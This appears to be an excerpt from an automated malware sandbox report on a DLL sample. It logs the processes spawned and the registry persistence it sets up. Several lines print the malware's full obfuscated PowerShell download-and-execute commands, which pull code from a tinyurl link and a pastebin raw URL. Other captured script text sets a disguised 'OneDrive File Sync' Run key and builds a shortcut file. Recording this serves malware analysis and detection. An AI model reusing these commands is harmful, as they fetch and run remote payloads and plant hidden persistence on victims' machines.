Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: 5UIy3bo46y.dll Static PE information: section name: _RDATA
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFAAB53752B push ebx; iretd 7_2_00007FFAAB53756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFAAB510C3B push ebp; ret 20_2_00007FFAAB510C3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFAAB5E7BCA pushad ; ret 20_2_00007FFAAB5E7BCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFAAB5E6DC3 push edi; iretd 20_2_00007FFAAB5E6DC6

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: attrib.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: NULL
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
